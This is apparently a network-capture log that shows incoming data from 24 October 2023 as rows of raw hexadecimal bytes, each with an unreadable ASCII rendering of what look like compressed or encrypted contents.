                                                                                                    2023-10-24 04:55:22 UTC2895INData Raw: f8 15 37 7c 56 e2 c4 22 7b 68 b9 c5 95 3a d4 cf 92 f3 bb a7 62 ca 58 2b ce 9f 15 0d 4f 2f fc e3 74 8b 3a 09 ab de 80 32 6e 18 df 95 9e 70 23 6c 1b f5 5b 3b 4f 7a f4 70 c3 0f 9d 3d b9 d7 c4 42 48 65 5d 72 ae e8 2b 5b fd 4a 70 75 67 3b 7e 7e 51 13 92 ce ab d2 3e fd 2c 79 b6 b7 1d 1e 79 b9 90 f3 db 0f 83 2c 8f 7b f4 3b fb 3f b1 3c d5 12 e5 5d 3e df 0c 5d 0f bf 87 5c a0 8b 27 51 3a 6e d5 c7 8d 06 cc 2e d3 77 c0 53 2f 0d 3a 9f 72 5c aa d6 9c 42 bb 81 83 58 f9 98 0e 3c 7d b0 98 5a 64 ad 93 b5 b9 1d b0 d4 bd 98 5d f5 e7 40 78 c2 76 ea 68 9c 2b 69 56 2d 71 6f 1f 17 1e 74 cc 0a 96 ef 7e 48 41 8b 6d 65 59 d6 2e 8c 3c 60 cc bd 2d 1b 40 db 55 8b 0c 2e 79 c9 e8 d1 cb 71 c8 b9 23 ac bd 27 03 7a 3a 2d a3 d3 1a 83 25 d9 f8 29 ee 70 4e e0 7b d7 4c 20 b8 87 21 8d cd 03 b1
                                                                                                    Data Ascii: 7|V"{h:bX+O/t:2np#l[;Ozp=BHe]r+[Jpug;~~Q>,yy,{;?<]>]\'Q:n.wS/:r\BX<}Zd]@xvh+iV-qot~HAmeY.<`-@U.yq#'z:-%)pN{L !
                                                                                                    2023-10-24 04:55:22 UTC2902INData Raw: 46 9f 68 8b 8a 9d e4 9a 87 23 b7 8a 63 cf 82 16 90 56 0d a4 fe fe 84 94 68 e9 e3 7f e3 ab d8 ef ed 0c a8 b7 30 a6 b0 ca 72 c9 18 36 00 0d 8d ab b9 fd e4 18 b0 7c a7 40 ed 2d 26 49 56 8f e5 d8 f7 b7 31 2f d7 5a 08 41 4a 4f 28 2a f0 8c ac 2a 3a 89 da c7 07 f0 89 7f 0c 70 b1 f9 4d ee 67 97 4a cb 5f 25 e8 14 db 9f 3f fa 05 40 2f 9d dd b4 eb fa 6c b9 13 a7 83 cd 0f 94 78 fa 9f 87 f0 fb fc 47 f2 f9 4a e2 ba 7d 0d 6e bc d1 cc 49 f3 2d 61 dd 1e 7b 3a 37 eb 8a 7c e8 b9 1b 33 fe db ca 17 b5 b3 c0 bb 45 3d 75 be b2 5f 5e 5c bd 85 a5 43 dd 79 d1 b2 37 30 7c b3 31 75 cc b9 2e 51 6a 97 71 e0 80 fd bc 4d db 1b 5e 45 a7 92 99 52 1b e9 d8 6d 14 4e bb fb 86 6b 77 1e 87 d9 6d 8e 90 47 1b 65 f9 50 bd 1f 8f b5 3a c3 07 b2 93 e0 4b 85 1b 39 3f 77 14 35 b3 4c 7c 67 de 91 7f 8d
                                                                                                    Data Ascii: Fh#cVh0r6|@-&IV1/ZAJO(**:pMgJ_%?@/lxGJ}nI-a{:7|3E=u_^\Cy70|1u.QjqM^ERmNkwmGeP:K9?w5L|g
                                                                                                    2023-10-24 04:55:22 UTC2910INData Raw: 0c 2d 82 78 d7 9b 34 a4 9f 9b 4c 49 08 c5 9f b7 b7 f3 f4 43 3b 60 a0 9b 0b 71 be a9 78 77 1d 8c 03 ee dc e6 59 ff f5 dd 94 fa ab 14 ae 97 20 0e 25 56 38 62 86 2f 9b 7c 3a 0c 36 af 84 ce 24 04 4b f9 b4 de a8 9c a9 c5 6f 6c 9d 61 e4 a6 af f4 7d af 8f 78 ae 9e 8c 1b 65 38 ff fc bb 01 b6 d8 6c a5 65 37 ee 8a fb a6 b3 78 fa 14 b0 9e 5e 0d e8 a4 6d a4 77 ad cc 25 bb bd 39 9a 75 ef c4 53 06 f5 80 76 f1 83 e9 94 fb 5e 49 ac 32 c1 5b 45 c1 fc ec 4e 16 2c 2d ba 4c 4f 7c 62 64 f6 3f 5f 4c ed bd 91 59 61 17 5c 79 c1 14 67 de 59 1a ba 94 a1 c5 e9 de fc d0 fc 21 fc 48 fd 42 ea ef ec 64 d3 d2 1a cc c8 d9 ca df 06 8c 84 63 a7 32 28 6f cc 29 49 4b ca 41 c5 19 d7 d8 a5 5b 34 1c 0d 32 a0 d6 5b f5 a4 4a bd 01 2b 56 ed e6 7f f1 aa b0 b3 21 9f b6 f4 b7 93 ca 65 ef 91 bb 7d 60
                                                                                                    Data Ascii: -x4LIC;`qxwY %V8b/|:6$Kola}xe8le7x^mw%9uSv^I2[EN,-LO|bd?_LYa\ygY!HBdc2(o)IKA[42[J+V!e}`
                                                                                                    2023-10-24 04:55:22 UTC2918INData Raw: 5f e6 42 c8 2d 78 4a 2b 1b fb c8 5c f5 28 74 33 f9 c2 26 9d 97 82 a3 d2 33 52 ca 5b 29 4f 1f ff c2 b7 63 db 70 5e ef dd 30 6f 9e 3a cd f0 13 39 ef 91 82 2e 2d ea d8 fd 84 09 d8 3e 9c 46 85 c7 ac c5 fa dd 1d fc f7 d1 93 bd 16 9f 80 91 a3 7c 69 66 ea 75 19 71 77 29 1e d5 73 62 ff 62 0d f0 bc 61 43 3d bb de 95 cd 1e 37 b0 41 75 07 b7 39 d2 16 de 9d ef 48 4f 15 37 c8 48 ab a5 a8 82 c5 9c e9 d3 05 22 33 14 29 75 e6 5c b1 09 39 82 55 e7 2c 79 73 42 3d f8 bd cd a0 ee 35 3f e5 a0 8e 0f 46 4c f9 cc fa d5 e7 e0 f6 98 65 e4 70 49 57 e4 62 4f 34 0a ad 60 c5 97 c7 61 bd 3b d2 d3 79 1f 24 fb d1 50 b4 fb bb 80 1f b4 6d 0d d3 36 e8 91 f4 51 90 e4 ad c3 b1 48 e5 13 0f 5f 71 02 2a 4e 14 53 ec cf f5 62 3d b6 1f f6 bd d2 85 07 2f 0a 01 a7 df 4b a8 7e ce 09 09 cc 2c c4 c3 0e
                                                                                                    Data Ascii: _B-xJ+\(t3&3R[)Ocp^0o:9.->F|ifuqw)sbbaC=7Au9HO7H"3)u\9U,ysB=5?FLepIWbO4`a;y$Pm6QH_q*NSb=/K~,
                                                                                                    2023-10-24 04:55:22 UTC2926INData Raw: a4 6b 83 cd cb af b4 f5 80 be cc 1d af 8f fe 7a db 78 d8 fb 1d d0 18 9a 46 2a 1d 1f 8a de 08 55 ac 9e bb 8d 0f 2e aa 87 d7 53 37 d1 8a 3d 1f 64 d0 8f 3c dc 14 b0 83 03 43 bf 41 d6 e7 42 aa 7f 39 5a f6 a7 3c 46 8d e3 9a 9c ef b3 1d b2 df 17 93 e7 c8 54 89 1c 30 16 5f 67 8f fc e7 cf 13 21 aa ac 81 54 62 d2 24 d9 ac 06 6d bf 35 72 a7 e8 08 e8 d6 17 49 f3 cd 0b 59 b4 7b 09 d6 37 56 f1 b8 57 2e 90 d3 7b 15 a5 ef ec 2c fd ce b7 c1 16 37 9e f1 87 8c 74 c8 57 bf 42 cf 74 13 45 4f 3b 09 37 7b 59 f3 e0 49 4b a0 ab 51 29 2d 48 71 97 2e 4a 9e 68 35 e1 12 c7 f6 9d 0e a5 81 ed e8 e0 77 33 b1 98 1e 84 a3 5c 8b 78 dd 89 23 b0 a5 9f 2e 7d f4 b3 94 ba f8 1d b8 ef 70 2a 47 ab 97 c1 1f 67 5d ca 1b bb 52 ee 34 dd c1 2b 8b 91 bb 5f 1e 00 7a 8e 17 29 b0 a3 a1 94 3a 1e 46 a3 47
                                                                                                    Data Ascii: kzxF*U.S7=d<CAB9Z<FT0_g!Tb$m5rIY{7VW.{,7tWBtEO;7{YIKQ)-Hq.Jh5w3\x#.}p*Gg]R4+_z):FG
                                                                                                    2023-10-24 04:55:22 UTC2934INData Raw: 64 ba 4b d3 76 03 dc 35 7a 17 8f ff 36 00 ae 5f b2 a0 9f 53 b4 e5 e5 ef 2a ac e9 5f cc 6f 53 c6 41 8f d3 3d 69 51 87 34 99 ba e1 31 da 86 1a f3 84 d5 51 70 d9 e7 0f 29 cd 6e 10 a7 33 b7 f0 d7 b3 69 2c f5 7b 20 62 4c 3f ba a7 9c 24 56 1a fd f1 93 7d 6f ee 6e f0 06 22 cb 5b 90 59 1f 03 39 a2 56 86 19 5e dd b8 43 76 1a 6c 3c 94 40 7e 3d d6 88 df b9 1d 98 fb 5d 8f 87 ec b4 00 ab 93 cb a8 43 44 4b 19 fe 2a 10 c7 d5 fc c7 de 1b 1b e1 f0 fb ff 48 df 6f 85 6c da fa 09 8d 9c 6c f9 6c f0 16 a8 8d db 4d 8b 73 af 8a c2 aa f9 38 da 79 20 47 57 f8 c2 5f 95 78 4a 79 31 52 a2 ca 3e a3 49 87 62 ae 5e 76 0a 42 c6 4c a5 90 31 03 a5 df d3 1d e8 59 fc 9d 87 bf 99 0f 47 df 47 d3 c4 67 23 c5 27 f9 0b ea 8c ad 61 8b 35 77 e0 7e 98 32 55 cf 38 2c 86 07 8e 63 be 42 4f 6e 9b a5 0e
                                                                                                    Data Ascii: dKv5z6_S*_oSA=iQ41Qp)n3i,{ bL?$V}on"[Y9V^Cvl<@~=]CDK*HolllMs8y GW_xJy1R>Ib^vBL1YGGg#'a5w~2U8,cBOn
                                                                                                    2023-10-24 04:55:22 UTC2942INData Raw: 7d eb 30 bb e8 cf bf fb 68 06 5c f8 90 ae 81 a5 3c ce d3 c4 8a 62 4d 2e 36 59 08 ab de f4 a4 83 0e a6 d2 a2 2e 0a 75 56 6f e0 6e 1f 17 c3 0e 87 77 d4 e0 b3 46 46 46 0d c1 9c 47 bd f9 71 e7 0c b0 de 62 45 45 e3 de cb bb fa ee a8 9b 62 c0 bd 87 be 82 ae 1d da d0 ce d4 a9 b2 a3 f9 0b f6 9c 71 95 47 57 f6 82 0b 03 fc a9 f7 20 33 99 fd 6d 18 0e bc f5 8d d5 ba 04 83 c5 f9 85 74 c1 aa bf 6c 6e 7c 8f ad e7 dc e2 28 e5 9b 70 72 42 26 b5 9b 95 2a 86 c3 f6 e1 fe 9c 6e 3c c5 62 38 74 19 b7 8d 4a 7a c6 4a e1 fe 4c cc fd c7 25 aa 23 b6 81 9e 3f 52 ad eb 1f 09 df da 1b bf 35 8c 65 67 1d 27 f8 a9 73 82 94 ad 95 e4 9a ca 61 b4 fc f0 93 37 ec f9 b7 e7 27 95 e9 9c 55 b6 ac f7 ff 88 15 bf 97 f3 fb 2b c9 f0 0b 8a 68 a5 85 ab 98 16 7f 43 57 aa e0 f7 47 c2 e0 e7 d2 31 74 de 60
                                                                                                    Data Ascii: }0h\<bM.6Y.uVonwFFFGqbEEbqGW 3mtln|(prB&*n<b8tJzJL%#?R5eg'sa7'U+hCWG1t`
                                                                                                    2023-10-24 04:55:22 UTC2949INData Raw: b2 24 ba 17 86 af 36 e0 59 fd 4b e0 82 4e 21 ed cb dd 23 81 af b7 e1 be b4 0b 3c 65 ea 34 f8 71 f4 2b 0d b7 33 11 db 7b 66 f8 61 a3 29 8f 1e 5b 00 69 5f 1c 49 69 5a aa 04 0c de 89 ae b0 88 17 a6 8e 81 56 67 bb 51 a3 d3 1d 79 73 e1 2a de ed 7f 99 9d 62 4b 20 72 4e 2e c5 05 1c 95 9a a3 37 f0 75 59 16 6f 78 e0 09 87 37 ad a7 5a 05 7b 01 e5 50 8c 0f 7a cf 8a 46 85 10 31 2e 90 de 78 14 8b 85 fe 58 fc 6d 9b cf f9 67 53 61 5d c5 29 32 b9 5d 2c 13 da a8 e2 eb cc 7c 9e 6f 38 08 b2 4d 46 d0 c5 3f 3a b2 58 71 26 a6 cf f5 e1 59 35 a3 41 e1 47 29 79 8e f8 2d b7 52 3f e3 f8 c3 15 ec 14 bd 0d 0e bf 2e a7 b6 1e 3d 64 74 e3 74 4c b2 2c fc d7 93 cd 60 96 30 84 5a ed 42 79 ee 3a 03 5b cc 37 64 3a 9a 01 9d f7 4f a4 1b cf 4e 4a 54 b7 15 a8 df b2 25 db d5 ec 83 a3 9e cd e4 b4
                                                                                                    Data Ascii: $6YKN!#<e4q+3{fa)[i_IiZVgQys*bK rN.7uYox7Z{PzF1.xXmgSa])2],|o8MF?:Xq&Y5AG)y-R?.=dttL,`0ZBy:[7d:ONJT%
                                                                                                    2023-10-24 04:55:22 UTC2957INData Raw: 8f 20 d5 a7 b5 52 59 72 15 d3 ef a8 f0 ad 95 c7 61 7e 68 22 f5 38 d1 59 b6 ad 3c 8c 41 ad 6b f9 7a 83 17 1c f8 e4 4f 7f 73 af c8 f4 d1 6a f8 e0 ad 32 87 77 2a 83 a1 8e cb 49 e9 e0 65 39 34 4a 1b 17 af fc 8f 1d 7b 2f 86 aa fd fb 48 4f 67 b1 24 46 23 ee ec aa cb 61 57 9f 43 a5 95 3b b9 bb 9d 94 0d 26 97 f0 6e d1 01 d6 58 39 13 54 3e 6d a5 ab 4e 0b a4 fd 8c 8b 78 6f cf 1d ae 5c eb 05 96 9a a9 34 57 75 9d b8 5a 1f 43 33 95 04 96 5f b9 30 3c 63 3d 7d 98 93 23 d3 d5 fe c3 b7 63 37 b3 d9 f1 43 70 68 f0 02 52 af dd 2f 0a 49 fb d0 24 13 f8 f0 a3 43 d0 7d d6 2f 7a 77 c1 49 4e e6 d4 60 72 51 4f b6 74 af 83 38 bb 35 34 7c 64 a6 2c d1 7c 8f 4d 3d 1a 39 64 91 33 0c d8 1e 41 2d da 57 48 c0 f0 4d e8 3e 63 07 47 ad 3b 0e 96 1f 2d 69 70 d5 78 b1 47 65 1c a8 b8 94 3f 74 5e
                                                                                                    Data Ascii: RYra~h"8Y<AkzOsj2w*Ie94J{/HOg$F#aWC;&nX9T>mNxo\4WuZC3_0<c=}#c7CphR/I$C}/zwIN`rQOt854|d,|M=9d3A-WHM>cG;-ipxGe?t^
                                                                                                    2023-10-24 04:55:22 UTC2965INData Raw: a5 1b 58 d8 6b 2e 2f 38 37 18 1c 07 84 53 a8 4d 4b 39 d6 69 2d 46 2c 09 e0 c3 93 5c a1 31 31 9e 4e 39 7f 97 12 ff f1 18 a0 1b cb ad 13 73 61 a1 b9 0a b5 b8 90 2a 45 1d 53 d0 af 2e 97 ed 07 6f 83 c5 4b 55 28 d2 ed 97 14 ff dd 84 c7 96 55 b3 aa 4e 1b 08 f3 3b 4c f6 9f 4e c8 e5 ca 35 f8 23 7a 2a 2f bd 97 02 ed 5c 27 d3 56 8f b5 d2 a1 62 0f 8e 37 ac e7 87 cb 5d 20 ef 5f 0d fd 8c cf 90 7d 9a 6f f1 a6 fb 34 7e ee 90 0c ad df 5d a0 1c c5 2e 72 ba bb 32 86 4c 2b 61 a8 f8 01 5d d6 3e a6 a0 6e 11 b2 11 af e1 8d e9 f9 6c d1 b7 0d f4 2e 46 ea f5 23 5d b4 6a 96 61 6c 77 17 de f3 be 04 6e a8 66 50 60 a0 b7 0c 08 ea 8a 17 62 e6 f2 58 c5 6b d0 bf 41 8d fa a7 b0 c4 cc 4b c5 a4 19 0d 7c 32 b1 35 3c ee 38 81 de 7f 9b 27 0f 46 3a a3 ee b9 cf dc 58 71 02 96 77 30 a5 bf 33 b2
                                                                                                    Data Ascii: Xk./87SMK9i-F,\11N9sa*ES.oKU(UN;LN5#z*/\'Vb7] _}o4~].r2L+a]>nl.F#]jalwnfP`bXkAK|25<8'F:Xqw03
                                                                                                    2023-10-24 04:55:22 UTC2973INData Raw: 5f 69 56 ef 82 bd 7e 45 f1 72 7f 7f e8 68 af 4a ad b6 29 48 e7 e0 2a 54 7a 19 cb fd 4c 05 9e 55 8c a4 b9 0f 16 8a 69 a7 15 38 7f c0 2c ee 9d 67 0b 2f bb 9e a7 fb 5e 3b e5 f5 d5 13 d8 f2 77 3a ff d7 6e 2c 5c f0 4b 23 b7 7c 47 19 39 e1 1b 56 e6 96 70 ed 90 45 a0 ac 7a 95 d4 ce bf 17 b3 da 45 58 da a0 c5 91 d1 c9 30 b1 bd 11 95 77 9f 2f 0b af 27 61 9b a8 99 6c 50 31 0e b4 dd 3a d1 bd b6 23 e4 d3 dc bb 78 d5 7d 12 f7 fd f6 0b 5c 72 1d 29 c3 c7 40 9a 02 5b e2 ca b2 2f 7c 7c 93 39 a8 2f fc 44 8d 4d da b2 ac cd 6f b4 eb b6 9c 83 5b cd 04 87 cf 03 e8 83 f3 7d 59 f6 a6 3b 6a 45 2b 70 92 51 32 94 dc ae a0 6d 77 6c 65 ce 43 4f cc 52 d8 c4 d6 03 2e c0 9d a5 0b 68 f5 ed 00 31 ee 65 8e 9b 1f 1e e1 a8 e6 f6 b0 59 4d 8f b6 e3 46 79 b5 e8 18 7a 5a b7 e0 bb 75 fe 10 f7 73
                                                                                                    Data Ascii: _iV~ErhJ)H*TzLUi8,g/^;w:n,\K#|G9VpEzEX0w/'alP1:#x}\r)@[/||9/DMo[}Y;jE+pQ2mwleCOR.h1eYMFyzZus
                                                                                                    2023-10-24 04:55:22 UTC2981INData Raw: 70 16 56 b7 1c 4a 4a af 1e 8a f6 c4 0c c4 95 0e bc e8 74 06 bc 6b 71 9c e6 ce 3a 21 1e ae ee e8 16 63 ca a3 2d 7e 80 a3 e1 53 da ee a6 24 ab 5a 57 e1 f3 88 a7 9c fb 21 0e da a9 66 d0 c9 e9 0f e4 4a db ce 78 d1 b5 94 b7 54 ae 86 4f 27 ef 50 8b 56 29 92 d3 08 68 72 27 91 b3 c2 2e c2 7f c3 9c e8 8c 46 b0 cc 8b 58 8a aa 36 e9 dc f3 5b 03 9c 7b 6b 47 53 a2 0d c5 e2 5d 77 f4 f3 d0 e4 39 f5 93 c0 3a f2 07 b9 dd 0a 94 b9 75 5b f0 75 6e 1f 2e 72 fb 01 96 73 e6 50 5b 2f 4b 21 33 03 74 71 03 36 1d 6b 05 f7 ef 85 d2 74 a5 df f2 c0 fb 06 5a 3f c9 e4 3f d1 af 21 28 b7 1b d5 1c 98 23 fb 4b 3c 70 a8 a9 13 bb 3c b1 00 9f 72 17 72 0a 55 95 26 0d 53 2c 78 95 c0 3e 63 63 e0 ea cd 40 1a d5 49 53 36 86 85 e0 ea 2c 6d 3e 14 b6 1a 6e 54 0f a2 20 c5 c7 a2 63 52 80 ef 3d ab f9 dd
                                                                                                    Data Ascii: pVJJtkq:!c-~S$ZW!fJxTO'PV)hr'.FX6[{kGS]w9:u[un.rsP[/K!3tq6ktZ??!(#K<p<rrU&S,x>cc@IS6,m>nT cR=
                                                                                                    2023-10-24 04:55:22 UTC2988INData Raw: c0 73 a0 06 f9 75 38 27 df 3c 2b 70 9c eb 11 de d5 ef 00 14 58 cf fb b7 6e b6 98 bf 8d c0 d0 45 ff 71 57 b7 a3 b0 f8 d7 79 b2 6d a5 26 da d6 2e a8 5c 69 c0 5d 7e ed 81 59 77 d7 52 52 c6 1b a9 ac 1c 8c 53 8e 79 30 86 54 43 c9 f8 42 ba 16 d3 57 36 04 1c c3 03 5b db f1 8a 1d 9f 61 b3 f3 3a 52 f8 93 24 4e 4b 87 62 ec 71 57 36 d0 ea 06 8a 9e ab e9 5b fc 31 b1 f1 3c 87 d3 fc 47 f1 65 0f 77 e8 3d e0 21 ed 3e ef 2c af fe be c7 c3 73 7c 78 c9 d4 8b d0 c3 b3 99 d6 24 9c 92 cd 3d 3f 62 65 4d 24 87 76 d1 87 35 b3 c2 29 2c 2a 55 46 85 25 e0 dd 0c 25 9e 5e f9 03 b2 2a cd 68 77 d5 5b 71 d0 d0 43 ec 9f ce 8b bf 0c 07 a3 41 57 e8 b4 e7 09 99 7e 7d 3c 8e 1e 0c ac 1a 66 04 4d bd 66 93 fd 15 27 41 fb 21 ff fc f2 3b 67 50 13 44 fb 08 0d fe eb 28 dd 2f 3c 47 d3 be ad b8 4a 36
                                                                                                    Data Ascii: su8'<+pXnEqWym&.\i]~YwRRSy0TCBW6[a:R$NKbqW6[1<Gew=!>,s|x$=?beM$v5),*UF%%^*hw[qCAW~}<fMf'A!;gPD(/<GJ6
                                                                                                    2023-10-24 04:55:22 UTC2996INData Raw: 43 c5 a4 ed 7a ec a5 5a c3 ab ba 76 04 f7 1e 6e a4 fb b5 44 2a 17 dd 41 af df 35 ac bd d0 09 52 be c6 91 45 56 b6 18 27 2e 43 cb 8c 41 3c ef c4 2f 08 f5 5e 40 1b 8e 5a 88 c1 a5 68 8c 9a fd 91 5f 5c 69 82 ca ee 2a 34 c6 30 53 da 2f f8 8d 1e 6f 1e f2 c5 4d aa 60 5b 35 84 c4 68 88 28 5c be 8b 33 4a 02 39 2e 6b 1d f8 68 47 10 b4 2d 94 d3 95 8e f8 fc f1 30 96 9c dd f0 b5 60 29 19 8d 6b 10 df fc b7 18 b1 2e 99 e7 cf 5d 01 27 ff 73 a3 66 bb 36 32 fe 7a 0b 7c 33 78 2d eb 7c 71 02 37 17 2d 6a 69 11 22 e6 71 d5 a8 af 91 c2 63 8b f2 20 59 a5 9a 36 15 2f 95 4d c1 07 31 37 63 39 db a6 04 c0 d2 57 c3 e8 41 e6 58 f1 58 b4 12 bd b3 db f2 c7 0b f3 a0 85 52 12 7d 0f 55 96 a1 6a 0d f8 a1 75 2e df bf 92 07 ca c7 1b 68 cd e0 2c 41 cb fb e8 d4 f1 29 af 7f 7e 0b 7e bf b2 a6 9c
                                                                                                    Data Ascii: CzZvnD*A5REV'.CA</^@Zh_\i*40S/oM`[5h(\3J9.khG-0`)k.]'sf62z|3x-|q7-ji"qc Y6/M17c9WAXXR}Uju.h,A)~~
                                                                                                    2023-10-24 04:55:22 UTC3004INData Raw: 4a 8f 76 93 43 2f d4 51 39 f7 07 af 68 ad 0b 83 94 4d e9 73 fa 1e 31 d6 70 c4 aa 5d 65 fc dc 7b 28 9c fc 38 86 7e 45 27 c9 30 bd 5e a8 37 b8 81 b3 ed 03 c0 e5 c8 6d 7a 32 a0 8f 4c b0 d0 c3 98 cc 73 ac fb 36 11 0e 6c 53 a5 b4 07 11 f2 39 4f 11 ff 36 98 b0 61 9f 69 a0 d9 fd 22 59 5a ba 8b 4b 97 10 b4 2a de c5 e3 95 a7 c3 9c ad 1b e8 49 f8 14 61 d3 93 38 73 e0 51 7e 73 f7 21 78 ba d4 93 6a 8b 0a 89 d6 3e 8d 4e fa 37 79 8e 5f 3f b8 79 d3 9f 1a 9d af 89 8f c3 51 d4 cb 0e e6 65 ef dc e1 62 81 16 4d 5c bf 4e ea 25 10 1f e5 8e 63 fe ab 0c 3f b4 0f d3 b7 16 95 72 ec 86 22 9e 9a 34 9a e3 65 1e 78 35 ad a4 7b eb 6d c5 d9 ed 00 ba f7 aa 67 f7 51 db 21 7a 8b 39 6d 5a 7f 5b 9a eb da e2 b2 45 c3 f8 d1 eb b3 b0 1f 2c e9 c9 97 02 b9 7f 3b 15 3b c6 9a 72 a0 72 57 78 e7 5a
                                                                                                    Data Ascii: JvC/Q9hMs1p]e{(8~E'0^7mz2Ls6lS9O6ai"YZK*Ia8sQ~s!xj>N7y_?yQebM\N%c?r"4ex5{mgQ!z9mZ[E,;;rrWxZ
                                                                                                    2023-10-24 04:55:22 UTC3012INData Raw: 4d 0a 4d 63 24 10 4d f0 98 56 3b 9e 19 61 00 01 db 8f 91 be f1 51 09 d3 d5 c2 da a7 8b b9 a3 6e 11 98 3f 0b a3 64 ec 29 bf d2 ad 71 e6 fe 19 fc 6c d6 6f 78 13 a7 46 65 4e 23 a4 ed 9b 78 dc 64 a2 c3 26 25 c6 d0 5d ab 1d a5 ae 9e 2c 85 fa 07 30 47 bf 98 5f 5a 5f 03 8b fe 2b 29 41 a1 59 76 da 45 63 4e d3 14 9e ea 76 0c 4a 0c c2 c9 c8 77 86 04 bd 99 82 17 f6 b4 e0 ee f6 ab 41 d3 65 1a ad 7b d8 43 be 7a de c7 2f db df f1 69 e3 20 88 e9 eb 46 4a 03 9e c9 18 9b 5c 6c 1c 68 cc 81 8b cf 42 d2 5a 55 6a be 1b 2d 21 cb 3c 30 e7 54 0a 1f b7 b4 80 89 95 76 a4 db f1 bc 14 7f 1d 86 89 f2 8c 37 1e de 0d ba 73 35 c8 ee e9 6d b1 57 1c 8a 4b 57 74 62 51 50 01 c3 48 45 d2 dc 61 2a 5b 6d 13 ff 71 22 f2 b1 1e 02 b1 5a 73 68 ee c8 16 d2 31 52 11 ed 2d 07 70 9b 0e f6 10 5a e6 4c
                                                                                                    Data Ascii: MMc$MV;aQn?d)qloxFeN#xd&%],0G_Z_+)AYvEcNvJwAe{Cz/i FJ\lhBZUj-!<0Tv7s5mWKWtbQPHEa*[mq"Zsh1R-pZL
                                                                                                    2023-10-24 04:55:22 UTC3020INData Raw: a7 ef 4d 73 24 57 63 23 46 8d f3 62 fd 83 f1 30 d3 07 68 b8 e7 23 09 77 d1 c4 ac 39 ba 6c 5b ea 0f 01 57 f5 29 7e c8 54 b1 55 cc c1 14 47 15 4e d8 7a 18 b6 46 e8 52 e0 96 54 d9 f4 e7 35 a6 18 f4 e1 e9 d2 02 02 82 16 51 dc dc cf 92 b3 ce 12 5b eb 6f 67 c7 92 35 40 df b7 d1 8a 2d 33 a5 c5 d6 09 18 18 f6 81 5f 96 b6 83 dc 9e f7 48 e9 c8 7b c9 b4 79 8d ad d6 f7 e4 ce 2e 6d 61 41 d1 7b 1a 70 a5 51 aa 3b dd c0 f6 59 2e 7c 2e 30 12 d4 7e 1c a7 17 59 0b 44 b5 e3 52 5c 98 ab c6 76 ae b7 a1 dd fc a3 74 6b e3 71 59 d5 7c 07 b7 9d 6b e6 da be 8f e0 c1 06 6f f2 4d 3f 22 9a ad bf 60 48 d5 2a ce 8f d9 08 c7 34 66 93 cb d6 cf f2 5e cb 19 4b 7e d9 71 b6 09 c3 92 fa 2f 14 f8 ad 50 42 fa 65 20 e9 ff bb 6d 3f 77 81 59 36 a3 69 bc ed 58 f1 d2 d7 c2 33 a3 74 f8 ad f9 57 d0 0d
                                                                                                    Data Ascii: Ms$Wc#Fb0h#w9l[W)~TUGNzFRT5Q[og5@-3_H{y.maA{pQ;Y.|.0~YDR\vtkqY|koM?"`H*4f^K~q/PBe m?wY6iX3tW
                                                                                                    2023-10-24 04:55:22 UTC3027INData Raw: 7e c7 04 49 6a c7 07 e8 0b 96 5c 28 d6 b0 26 23 82 ae e4 1e 14 8f a3 93 70 f5 1d 23 6e 7b f9 34 b4 8e 3b 46 ee f3 5f cb c1 d9 9e b8 6d 8e 2e a7 95 d7 c3 d7 fd df 49 7b ec 57 71 9c ac 8e e9 4d de 6c 5d d2 05 42 12 2e d3 e9 2f 5b 64 ca 1b 5f ac 18 d9 99 4b dc 6e 82 0c 79 48 fb 87 1b ca cd 73 47 d1 5f 23 8c e1 65 0e 78 7d 7f 46 9d 3a 5b 4a aa db 42 cc bd 34 e8 7f 8e ce fb 2d 04 b7 8b c3 32 2a 94 4a 39 8e e3 74 14 a5 42 64 7c 4b 46 65 2b a3 24 b2 25 33 11 32 8a 26 2a 0a 0d 15 ca 88 52 94 d0 a2 90 6c 09 45 46 91 51 88 52 22 89 ec 5e d7 fb 17 3c cf 75 3d e7 7c 3e f7 fd d3 c3 3d 37 05 c1 af a6 a1 34 75 ae 9b 8c 53 dd 85 0b 66 05 71 7c a5 35 b8 0f cb a4 ae 87 e3 25 a4 ba 23 96 96 f7 e6 6e 21 bf 20 db c2 86 0a ee a6 89 7a fb e3 18 7d 66 12 4f 0f d2 05 97 43 7b a8
                                                                                                    Data Ascii: ~Ij\(&#p#n{4;F_m.I{WqMl]B./[d_KnyHsG_#ex}F:[JB4-2*J9tBd|KFe+$%32&*RlEFQR"^<u=|>=74uSfq|5%#n! z}fOC{
                                                                                                    2023-10-24 04:55:22 UTC3035INData Raw: cd 84 3b 1c 11 b8 14 ec 4e 5c 22 cb e1 b1 32 5b bb ea ff ff 92 7d 5d aa 0c c3 86 ef a6 ca d9 d3 44 e5 67 09 1a f6 ad e0 19 33 26 c1 a7 97 1b 29 68 d1 43 d9 1a dd 0a 97 47 4f e7 e5 16 c7 21 bb 77 3d d9 96 27 4a e1 32 7d 54 39 df 8f 33 9d 93 40 ff 5b 15 19 05 ad 95 dd 33 26 e3 c3 87 eb b8 c7 ab 5e b0 b2 20 8b 86 04 ae 96 4d 51 03 d0 61 90 0d af 0f f9 05 6d cd ba d1 79 8b 83 12 9c 64 80 cb 3c 26 f2 38 f5 a7 30 73 b4 2e ed 29 7e 2f 8a 8a d9 38 70 dd 23 f6 48 f9 0b ce 41 5f e9 71 c2 69 d1 bd de 11 ff 8e 7b cb bd 3b 14 c3 f1 8a 3d d4 e2 ae 91 d4 1d 9b 8d 0a ab 3f 70 89 64 40 fa b9 6b b4 27 7a 86 9c 2a ce 41 e3 ac 1d 1c a9 ac 0c bd cf 31 b5 54 dc 2c 37 ce 12 4e 58 f1 81 7f 9e 70 81 86 73 1f e9 d6 ca 7e 52 5b fe 0c 97 6d ee c5 f5 de eb 60 eb 13 15 da 51 aa 2c c5
                                                                                                    Data Ascii: ;N\"2[}]Dg3&)hCGO!w='J2}T93@[3&^ MQamyd<&80s.)~/8p#HA_qi{;=?pd@k'z*A1T,7NXps~R[m`Q,
